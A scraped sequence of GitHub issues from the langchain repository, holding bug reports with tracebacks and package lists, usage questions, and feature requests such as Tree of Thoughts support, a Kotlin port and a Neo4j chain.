Expected that API requests are logged on promptlayer.com.
However, nothing is actually logged. | PromptLayerOpenAI doesn't work with planner | https://api.github.com/repos/langchain-ai/langchain/issues/4995/comments | 1 | 2023-05-19T18:56:35Z | 2023-09-10T16:15:07Z | https://github.com/langchain-ai/langchain/issues/4995 | 1,717,682,308 | 4,995 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3, Google Colab/Mac-OS Conda Env, Langchain v0.0.173, Dev2049/obsidian patch #4204
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See Colab: https://colab.research.google.com/drive/1YSfKTQ92RZEJ-z-hlwHL7f5rQ-evTgx4?usp=sharing
1. Have Obsidian Files with Front_Matter other then simple key_values
2. Import ObsidianLoader and create loader with the Obsidian Vault
3. load documents
YAML frontmatter is parsed to:
metadata={'source': 'Demo-Note.md', 'path': 'Obsidian_Vault/Demo-Note.md', 'created': 1684513990.4561925, 'last_modified': 1684513964.4224126, 'last_accessed': 1684514007.4610083, 'normal': 'frontmatter is just key-value based', 'list_frontmatter': '', 'dictionary_frontmatter': '', 'can': 'contain', 'different': 'key-value-paris', 'and': '[even, nest, these, types]'}
### Expected behavior
YAML Frontmatter should be parsed according to YAML rules
---
normal: frontmatter is just key-value based
list_frontmatter:
- can
- be
- an array
dictionary_frontmatter:
can: contain
different: key-value-paris
and: [even, nest, these, types]
---
-->
```
{
'norma'l: 'frontmatter is just key-value based,
'list_frontmatter': ['can', 'be', 'an array'],
'dictionary_frontmatter' : {
'can' : 'contain',
'different': 'key-value-pairs',
'and' : ['even', 'nest', 'theses', 'types]
}
}
``` | ObsidianLoader doesn't Parse Frontmatter of Obsidian Files according to YAML, but line-by-line and only for key-value pairs | https://api.github.com/repos/langchain-ai/langchain/issues/4991/comments | 1 | 2023-05-19T16:45:59Z | 2023-09-10T16:15:11Z | https://github.com/langchain-ai/langchain/issues/4991 | 1,717,534,417 | 4,991 |
[
"hwchase17",
"langchain"
]
| ### System Info
aiohttp==3.8.4
aiosignal==1.3.1
altair==4.2.2
anyio @ file:///C:/ci_311/anyio_1676425491996/work/dist
argilla==1.6.0
argon2-cffi @ file:///opt/conda/conda-bld/argon2-cffi_1645000214183/work
argon2-cffi-bindings @ file:///C:/ci_311/argon2-cffi-bindings_1676424443321/work
asttokens @ file:///opt/conda/conda-bld/asttokens_1646925590279/work
async-timeout==4.0.2
attrs @ file:///C:/ci_311/attrs_1676422272484/work
Babel @ file:///C:/ci_311/babel_1676427169844/work
backcall @ file:///home/ktietz/src/ci/backcall_1611930011877/work
backoff==2.2.1
beautifulsoup4 @ file:///C:/b/abs_0agyz1wsr4/croot/beautifulsoup4-split_1681493048687/work
bleach @ file:///opt/conda/conda-bld/bleach_1641577558959/work
blinker==1.6.2
brotlipy==0.7.0
cachetools==5.3.0
certifi @ file:///C:/b/abs_4a0polqwty/croot/certifi_1683875377622/work/certifi
cffi @ file:///C:/ci_311/cffi_1676423759166/work
chardet==5.1.0
charset-normalizer @ file:///tmp/build/80754af9/charset-normalizer_1630003229654/work
chromadb==0.3.21
click==8.1.3
clickhouse-connect==0.5.22
colorama @ file:///C:/ci_311/colorama_1676422310965/work
comm @ file:///C:/ci_311/comm_1678376562840/work
commonmark==0.9.1
cryptography @ file:///C:/ci_311/cryptography_1679419210767/work
Cython==0.29.34
dataclasses-json==0.5.7
debugpy @ file:///C:/ci_311/debugpy_1676426137692/work
decorator @ file:///opt/conda/conda-bld/decorator_1643638310831/work
defusedxml @ file:///tmp/build/80754af9/defusedxml_1615228127516/work
Deprecated==1.2.13
duckdb==0.7.1
entrypoints @ file:///C:/ci_311/entrypoints_1676423328987/work
et-xmlfile==1.1.0
executing @ file:///opt/conda/conda-bld/executing_1646925071911/work
fastapi==0.95.1
fastjsonschema @ file:///C:/ci_311/python-fastjsonschema_1679500568724/work
filelock==3.12.0
frozenlist==1.3.3
fsspec==2023.4.0
ftfy==6.1.1
gitdb==4.0.10
GitPython==3.1.31
google-api-core==2.11.0
google-api-python-client==2.86.0
google-auth==2.18.0
google-auth-httplib2==0.1.0
googleapis-common-protos==1.59.0
greenlet==2.0.2
h11==0.14.0
hnswlib @ file:///D:/bld/hnswlib_1675802891722/work
httpcore==0.16.3
httplib2==0.22.0
httptools==0.5.0
httpx==0.23.3
huggingface-hub==0.14.1
idna @ file:///C:/ci_311/idna_1676424932545/work
importlib-metadata==6.6.0
ipykernel @ file:///C:/ci_311/ipykernel_1678734799670/work
ipython @ file:///C:/b/abs_d1yx5tjhli/croot/ipython_1680701887259/work
ipython-genutils @ file:///tmp/build/80754af9/ipython_genutils_1606773439826/work
ipywidgets @ file:///C:/b/abs_5awapknmz_/croot/ipywidgets_1679394824767/work
jedi @ file:///C:/ci_311/jedi_1679427407646/work
Jinja2 @ file:///C:/ci_311/jinja2_1676424968965/work
joblib==1.2.0
json5 @ file:///tmp/build/80754af9/json5_1624432770122/work
jsonschema @ file:///C:/b/abs_d40z05b6r1/croot/jsonschema_1678983446576/work
jupyter @ file:///C:/ci_311/jupyter_1678249952587/work
jupyter-console @ file:///C:/b/abs_82xaa6i2y4/croot/jupyter_console_1680000189372/work
jupyter-server @ file:///C:/ci_311/jupyter_server_1678228762759/work
jupyter_client @ file:///C:/b/abs_059idvdagk/croot/jupyter_client_1680171872444/work
jupyter_core @ file:///C:/b/abs_9d0ttho3bs/croot/jupyter_core_1679906581955/work
jupyterlab @ file:///C:/ci_311/jupyterlab_1677719392688/work
jupyterlab-pygments @ file:///tmp/build/80754af9/jupyterlab_pygments_1601490720602/work
jupyterlab-widgets @ file:///C:/b/abs_38ad427jkz/croot/jupyterlab_widgets_1679055289211/work
jupyterlab_server @ file:///C:/b/abs_e0qqsihjvl/croot/jupyterlab_server_1680792526136/work
langchain==0.0.157
lxml @ file:///C:/b/abs_c2bg6ck92l/croot/lxml_1679646459966/work
lz4==4.3.2
Markdown==3.4.3
MarkupSafe @ file:///C:/ci_311/markupsafe_1676424152318/work
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib-inline @ file:///C:/ci_311/matplotlib-inline_1676425798036/work
mistune @ file:///C:/ci_311/mistune_1676425149302/work
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nbclassic @ file:///C:/b/abs_c8_rs7b3zw/croot/nbclassic_1681756186106/work
nbclient @ file:///C:/ci_311/nbclient_1676425195918/work
nbconvert @ file:///C:/ci_311/nbconvert_1676425836196/work
nbformat @ file:///C:/ci_311/nbformat_1676424215945/work
nest-asyncio @ file:///C:/ci_311/nest-asyncio_1676423519896/work
networkx==3.1
nltk==3.8.1
notebook @ file:///C:/b/abs_49d8mc_lpe/croot/notebook_1681756182078/work
notebook_shim @ file:///C:/ci_311/notebook-shim_1678144850856/work
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging @ file:///C:/b/abs_ed_kb9w6g4/croot/packaging_1678965418855/work
pandas==1.5.3
pandocfilters @ file:///opt/conda/conda-bld/pandocfilters_1643405455980/work
parso @ file:///opt/conda/conda-bld/parso_1641458642106/work
pdfminer.six==20221105
pickleshare @ file:///tmp/build/80754af9/pickleshare_1606932040724/work
Pillow==9.5.0
platformdirs @ file:///C:/ci_311/platformdirs_1676422658103/work
ply==3.11
posthog==3.0.1
prometheus-client @ file:///C:/ci_311/prometheus_client_1679591942558/work
prompt-toolkit @ file:///C:/ci_311/prompt-toolkit_1676425940920/work
protobuf==3.20.3
psutil @ file:///C:/ci_311_rebuilds/psutil_1679005906571/work
pure-eval @ file:///opt/conda/conda-bld/pure_eval_1646925070566/work
pyarrow==11.0.0
pyasn1==0.5.0
pyasn1-modules==0.3.0
pycparser @ file:///tmp/build/80754af9/pycparser_1636541352034/work
pydantic==1.10.7
pydeck==0.8.1b0
Pygments @ file:///opt/conda/conda-bld/pygments_1644249106324/work
Pympler==1.0.1
pyOpenSSL @ file:///C:/b/abs_de215ipd18/croot/pyopenssl_1678965319166/work
pypandoc==1.11
pyparsing==3.0.9
PyQt5==5.15.7
PyQt5-sip @ file:///C:/ci_311/pyqt-split_1676428895938/work/pyqt_sip
pyrsistent @ file:///C:/ci_311/pyrsistent_1676422695500/work
PySocks @ file:///C:/ci_311/pysocks_1676425991111/work
python-dateutil @ file:///tmp/build/80754af9/python-dateutil_1626374649649/work
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz @ file:///C:/ci_311/pytz_1676427070848/work
pytz-deprecation-shim==0.1.0.post0
pywin32==305.1
pywinpty @ file:///C:/ci_311/pywinpty_1677707791185/work/target/wheels/pywinpty-2.0.10-cp311-none-win_amd64.whl
PyYAML==6.0
pyzmq @ file:///C:/b/abs_8b16zbmf46/croot/pyzmq_1682697651374/work
qtconsole @ file:///C:/b/abs_eb4u9jg07y/croot/qtconsole_1681402843494/work
QtPy @ file:///C:/ci_311/qtpy_1676432558504/work
regex==2023.3.23
requests @ file:///C:/b/abs_41owkd5ymz/croot/requests_1682607524657/work
rfc3986==1.5.0
rich==13.0.1
rsa==4.9
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash @ file:///tmp/build/80754af9/send2trash_1632406701022/work
sentence-transformers==2.2.2
sentencepiece==0.1.99
sip @ file:///C:/ci_311/sip_1676427825172/work
six @ file:///tmp/build/80754af9/six_1644875935023/work
smmap==5.0.0
sniffio @ file:///C:/ci_311/sniffio_1676425339093/work
soupsieve @ file:///C:/b/abs_a989exj3q6/croot/soupsieve_1680518492466/work
SQLAlchemy==2.0.12
stack-data @ file:///opt/conda/conda-bld/stack_data_1646927590127/work
starlette==0.26.1
streamlit==1.22.0
sympy==1.11.1
tenacity==8.2.2
terminado @ file:///C:/ci_311/terminado_1678228513830/work
threadpoolctl==3.1.0
tiktoken==0.3.3
tinycss2 @ file:///C:/ci_311/tinycss2_1676425376744/work
tokenizers==0.13.3
toml @ file:///tmp/build/80754af9/toml_1616166611790/work
tomli @ file:///C:/ci_311/tomli_1676422027483/work
toolz==0.12.0
torch==2.0.0
torchvision==0.15.1
tornado @ file:///C:/ci_311/tornado_1676423689414/work
tqdm==4.65.0
traitlets @ file:///C:/ci_311/traitlets_1676423290727/work
transformers==4.28.1
typing-inspect==0.8.0
typing_extensions @ file:///C:/b/abs_a1bb332wcs/croot/typing_extensions_1681939523095/work
tzdata==2023.3
tzlocal==4.3
unstructured==0.6.2
uritemplate==4.1.1
urllib3 @ file:///C:/b/abs_3ce53vrdcr/croot/urllib3_1680254693505/work
uvicorn==0.22.0
validators==0.20.0
watchdog==3.0.0
watchfiles==0.19.0
wcwidth @ file:///Users/ktietz/demo/mc3/conda-bld/wcwidth_1629357192024/work
webencodings==0.5.1
websocket-client @ file:///C:/ci_311/websocket-client_1676426063281/work
websockets==11.0.2
widgetsnbextension @ file:///C:/b/abs_882k4_4kdf/croot/widgetsnbextension_1679313880295/work
wikipedia==1.4.0
win-inet-pton @ file:///C:/ci_311/win_inet_pton_1676425458225/work
wrapt==1.14.1
XlsxWriter==3.1.0
yarl==1.9.2
zipp==3.15.0
zstandard==0.21.0
### Who can help?
@vowelparrot
I have created a toolkit from chroma documents. I have also created a custom tool.
I want to create a vectorstoreinfo from my custom tool so I can use this tool in vectorstoreagent.
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.agents.agent_toolkits import (
create_vectorstore_agent,
VectorStoreToolkit,
VectorStoreInfo,
)
vectorstore_info = VectorStoreInfo(
name=" tax queries",
description="tax related documents",
vectorstore=db_store
)
toolkit = VectorStoreToolkit(vectorstore_info=vectorstore_info)
agent_executor = create_vectorstore_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
```
### Expected behavior
I have created a custom tool
```
def evaluate expression:
ans = "expression"
return ans
tool = Tool(
name = "Expression Evaluator",
func=evaluate_expression,
description= "useful for when you need output expression.
)
```
Please, inform How can I create a vectorstoreinfo using this tool and add in a toolkit so I can use this tool in vectorstoreagent. | How to create a vectorstoreinfo using a custom tool. | https://api.github.com/repos/langchain-ai/langchain/issues/4980/comments | 3 | 2023-05-19T12:11:25Z | 2023-09-15T16:12:26Z | https://github.com/langchain-ai/langchain/issues/4980 | 1,717,149,421 | 4,980 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.173
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI
from langchain.evaluation.qa import QAGenerateChain
from langchain.chains.loading import load_chain
example_gen_chain = QAGenerateChain.from_llm(OpenAI())
example_gen_chain.save("/Users/liang.zhang/qa_gen_chain.yaml")
loaded_chain = load_chain("/Users/liang.zhang/qa_gen_chain.yaml")
```
Error:
```
---------------------------------------------------------------------------
ValidationError Traceback (most recent call last)
Input In [13], in <cell line: 2>()
1 from langchain.chains.loading import load_chain
----> 2 loaded_chain = load_chain("/Users/liang.zhang/qa_gen_chain.yaml")
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:449, in load_chain(path, **kwargs)
447 return hub_result
448 else:
--> 449 return _load_chain_from_file(path, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:476, in _load_chain_from_file(file, **kwargs)
473 config["memory"] = kwargs.pop("memory")
475 # Load the chain from the config now.
--> 476 return load_chain_from_config(config, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:439, in load_chain_from_config(config, **kwargs)
436 raise ValueError(f"Loading {config_type} chain not supported")
438 chain_loader = type_to_loader_dict[config_type]
--> 439 return chain_loader(config, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:44, in _load_llm_chain(config, **kwargs)
42 if "prompt" in config:
43 prompt_config = config.pop("prompt")
---> 44 prompt = load_prompt_from_config(prompt_config)
45 elif "prompt_path" in config:
46 prompt = load_prompt(config.pop("prompt_path"))
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/prompts/loading.py:30, in load_prompt_from_config(config)
27 raise ValueError(f"Loading {config_type} prompt not supported")
29 prompt_loader = type_to_loader_dict[config_type]
---> 30 return prompt_loader(config)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/prompts/loading.py:115, in _load_prompt(config)
113 config = _load_template("template", config)
114 config = _load_output_parser(config)
--> 115 return PromptTemplate(**config)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/pydantic/main.py:342, in pydantic.main.BaseModel.__init__()
ValidationError: 1 validation error for PromptTemplate
output_parser
Can't instantiate abstract class BaseOutputParser with abstract methods parse (type=type_error)
```
### Expected behavior
No errors should occur. | QAGenerateChain cannot be loaded | https://api.github.com/repos/langchain-ai/langchain/issues/4977/comments | 2 | 2023-05-19T11:38:43Z | 2023-05-21T22:56:09Z | https://github.com/langchain-ai/langchain/issues/4977 | 1,717,108,430 | 4,977 |
[
"hwchase17",
"langchain"
]
| ### Feature request
https://arxiv.org/pdf/2305.10601.pdf
### Motivation
Language models are increasingly being deployed for general problem-solving across a wide range of tasks, but are still confined to token-level, left-to-right decision-making processes during inference. This means they can fall short in tasks that require exploration, strategic lookahead, or where initial decisions play a pivotal role. To surmount these challenges, there is a new framework for language model inference, “Tree of Thoughts” (ToT), which generalizes over the popular “Chain of Thought” approach to prompting language models and enables exploration over coherent units of text (“thoughts”) that serve as intermediate steps toward problem-solving. ToT allows LMs to perform deliberate decision-making by considering multiple different reasoning paths and self-evaluating choices to decide the next course of action, as well as looking ahead or backtracking when necessary to make global choices.
### Your contribution
maybe, not sure😥 | consider introduce ToT approch in langchain🐱🐱 | https://api.github.com/repos/langchain-ai/langchain/issues/4975/comments | 23 | 2023-05-19T10:50:30Z | 2023-08-17T20:58:11Z | https://github.com/langchain-ai/langchain/issues/4975 | 1,717,046,200 | 4,975 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi!
Can you change the version of pydantic in the dependencies? There is a vulnerability in this version, because it depends on pydantic. I can't install new versions of langchain because they don't pass the security check on my PC.
https://github.com/kuimono/openapi-schema-pydantic/issues/31
https://nvd.nist.gov/vuln/detail/CVE-2021-29510
### Suggestion:
Remove openapi-schema-pydantic from dependency?! | Issue: openapi-schema-pydantic vulnerability | https://api.github.com/repos/langchain-ai/langchain/issues/4974/comments | 3 | 2023-05-19T10:39:37Z | 2024-03-13T16:12:28Z | https://github.com/langchain-ai/langchain/issues/4974 | 1,717,032,053 | 4,974 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
Platform: Ubuntu 22.04.2 LTS
Python: 3.10.6
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Firstly, you can reproduce the errors using the following jupyter notebook, assumed that you have all the dependencies setup:
https://github.com/limcheekin/langchain-playground/blob/main/supabase.ipynb
When running the following code:
```
retriever = vector_store.as_retriever(search_type="mmr", search_kwargs={"k": 1})
docs = retriever.get_relevant_documents("What is Flutter?")
```
It return the following errors, you can see the complete errors thread at cell 6 from the notebook above:
```
ValueError: Number of columns in X and Y must be the same. X has shape (1, 768) and Y has shape (20, 0).
```
### Expected behavior
It should return 1 doc which similar to the documentation at https://python.langchain.com/en/latest/modules/indexes/vectorstores/examples/supabase.html#maximal-marginal-relevance-searches | SupabaseVectorStore ValueError in .as_retriever(search_type="mmr").get_relevant_documents() | https://api.github.com/repos/langchain-ai/langchain/issues/4972/comments | 1 | 2023-05-19T08:38:01Z | 2023-05-19T09:03:00Z | https://github.com/langchain-ai/langchain/issues/4972 | 1,716,866,155 | 4,972 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi guys,
New to github and my first post here.
Been testing out LLM + Langchain SQL agent and it's really cool.
However, I'm running into this issue constantly.
Say there are 3 types of continents in my SQL, the US, Asia, and Europe.
When I ask about 2 of them it works, but Asia kept giving me:
"The table does not have a column called "continent"
This is also right after it pulls the schema via: "Action: schema_sql_db".
You can clearly see the column name and it works for the other 2 but not this one.
Is there something I'm not getting?
Thanks.
### Suggestion:
_No response_ | Issue: The table does not have a column called $ when there clearly is. | https://api.github.com/repos/langchain-ai/langchain/issues/4968/comments | 1 | 2023-05-19T06:21:01Z | 2023-09-10T16:15:21Z | https://github.com/langchain-ai/langchain/issues/4968 | 1,716,692,511 | 4,968 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I'm trying to query from my knowledge base in csv by creating embeddings.
I was able to do it with OpenAI LLM model. But when I'm trying with AzureOpenAI model, I'm getting an error.
I've checked the LLM object for both OpenAI modela and AzureOpenAI model, attributes are all same, but I'm getting below error.
I'm using text-embeddings-ada-002 for creating embeddings and text-davinci-003 for LLM model.
It would be great if someone can give me leads. Thanks in advance.
Error:
Traceback (most recent call last):
File "C:\Users\akshay\Documents\GPT\azureLlmGPT.py", line 64, in <module>
print(model.run(question))
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 213, in run
return self(args[0])[self.output_keys[0]]
^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 116, in __call__
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 113, in __call__
outputs = self._call(inputs)
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\retrieval_qa\base.py", line 110, in _call
answer = self.combine_documents_chain.run(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 216, in run
return self(kwargs)[self.output_keys[0]]
^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 116, in __call__
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 113, in __call__
outputs = self._call(inputs)
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\combine_documents\base.py", line 75, in _call
output, extra_return_dict = self.combine_docs(docs, **other_keys)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\combine_documents\map_reduce.py", line 139, in combine_docs
results = self.llm_chain.apply(
^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\llm.py", line 118, in apply
response = self.generate(input_list)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\llm.py", line 62, in generate
return self.llm.generate_prompt(prompts, stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 107, in generate_prompt
return self.generate(prompt_strings, stop=stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 140, in generate
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 137, in generate
output = self._generate(prompts, stop=stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 297, in _generate
response = completion_with_retry(self, prompt=_prompts, **params)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 102, in completion_with_retry
return _completion_with_retry(**kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 289, in wrapped_f
return self(f, *args, **kw)
^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 379, in __call__
do = self.iter(retry_state=retry_state)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 314, in iter
return fut.result()
^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\concurrent\futures\_base.py", line 449, in result
return self.__get_result()
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\concurrent\futures\_base.py", line 401, in __get_result
raise self._exception
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 382, in __call__
result = fn(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 100, in _completion_with_retry
return llm.client.create(**kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_resources\completion.py", line 25, in create
return super().create(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_resources\abstract\engine_api_resource.py", line 153, in create
response, _, api_key = requestor.request(
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 226, in request
resp, got_stream = self._interpret_response(result, stream)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 620, in _interpret_response
self._interpret_response_line(
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 683, in _interpret_response_line
raise self.handle_error_response(
openai.error.InvalidRequestError: Resource not found
### Suggestion:
_No response_ | Issue: RetrievalQA is not working with AzureOpenAI LLM model | https://api.github.com/repos/langchain-ai/langchain/issues/4966/comments | 2 | 2023-05-19T06:12:01Z | 2023-05-20T09:06:11Z | https://github.com/langchain-ai/langchain/issues/4966 | 1,716,680,713 | 4,966 |
[
"hwchase17",
"langchain"
]
| ### Feature request
support for kotlin language
### Motivation
1.Safety and Reliability: Kotlin emphasizes on safety and reliability, and it can help developers avoid common programming errors through type checks, null safety, exception handling, and other mechanisms. Additionally, Kotlin provides a functional programming style that reduces side effects and improves code reliability and maintainability.
2.Interoperability: Kotlin seamlessly interoperates with Java, which means that you can use existing Java libraries and frameworks in Kotlin projects, and Kotlin code can be used in Java projects. Moreover, Kotlin supports JavaScript and Native platforms, so you can use the same code across different platforms.
3.Conciseness: Kotlin has a concise and clear syntax that reduces code redundancy and complexity. For example, Kotlin uses lambda expressions and extension functions to simplify code, and provides many convenient syntax sugars such as null safety operator, range expressions, string templates, etc. These features can greatly improve development efficiency and reduce the possibility of errors.
### Your contribution
I can write any partial code related to Kotlin. | Is it possible to support the kotlin language?Like langchainkt. | https://api.github.com/repos/langchain-ai/langchain/issues/4963/comments | 7 | 2023-05-19T05:34:35Z | 2024-06-15T14:01:51Z | https://github.com/langchain-ai/langchain/issues/4963 | 1,716,644,366 | 4,963 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
In the doc as mentioned below:-
https://python.langchain.com/en/latest/modules/chains/examples/llm_summarization_checker.html
Assumptions is misspelled as assumtions.
### Idea or request for content:
Fix the misspelling in the doc markdown. | DOC: Misspelling in LLMSummarizationCheckerChain documentation | https://api.github.com/repos/langchain-ai/langchain/issues/4959/comments | 1 | 2023-05-19T04:45:16Z | 2023-09-10T16:15:26Z | https://github.com/langchain-ai/langchain/issues/4959 | 1,716,598,909 | 4,959 |
[
"hwchase17",
"langchain"
]
| ### Feature request
- Neo4j
[Neo4j](https://github.com/neo4j/neo4j)
- langchain2neo4j
[langchain2neo4j](https://github.com/tomasonjo/langchain2neo4j)
- langchain2ongdb
[langchain2ongdb](https://github.com/ongdb-contrib/langchain2ongdb)
### Motivation
We are building some question answering tools based on the knowledge graph and it would be convenient to have some open libraries based on Neo4j.
### Your contribution
I'm trying to make a contribution:) | Consider adding the default Neo4jDatabaseChain tool to the Chains component | https://api.github.com/repos/langchain-ai/langchain/issues/4957/comments | 1 | 2023-05-19T03:33:24Z | 2023-06-08T00:41:58Z | https://github.com/langchain-ai/langchain/issues/4957 | 1,716,553,534 | 4,957 |
[
"hwchase17",
"langchain"
]
| I am trying on the Custom Agent with Tool Retrieval example, there are some times (not always 100%) when the Agent Executor will return the answer itself in the Action Input. The inconsistency make things even worse.
For example: I have a Small Talk Tool that will be in charge of answering casual conversation from user. I have given a profile to my agent (name: Sam). Here is one of the scenario that I got:
**Question**: Hello I am Bob, what is your name?
**Thought**: The user is initiating a small talk conversation
**Action Input**: Hi Bob, I am Sam, your personal assistant. How can I assist you today?
**Observation**: As an AI language model, I don't need any assistance, Sam. But thank you for asking! How about you? Is there anything I can help you with?
So the expected response by the agent became the action input, which in the end output another response which doesnt make sense at all. This goes on to happen to other tools as well such as querying content from Vectorstore.
### Suggestion:
Is there a possibility where we can restrict the action input to just the user question instead of allowing the agent to answer it and modify the initial context?
Be it the prompt or temperature? I'm open to any advice. Thanks!
| Issue: Agent Executor tends to answer user question directly and set it as Action Input during the iterative thought process. | https://api.github.com/repos/langchain-ai/langchain/issues/4955/comments | 4 | 2023-05-19T02:34:55Z | 2023-09-27T16:07:00Z | https://github.com/langchain-ai/langchain/issues/4955 | 1,716,519,016 | 4,955 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
Redis version: 4.5.5
Python version: 3.11
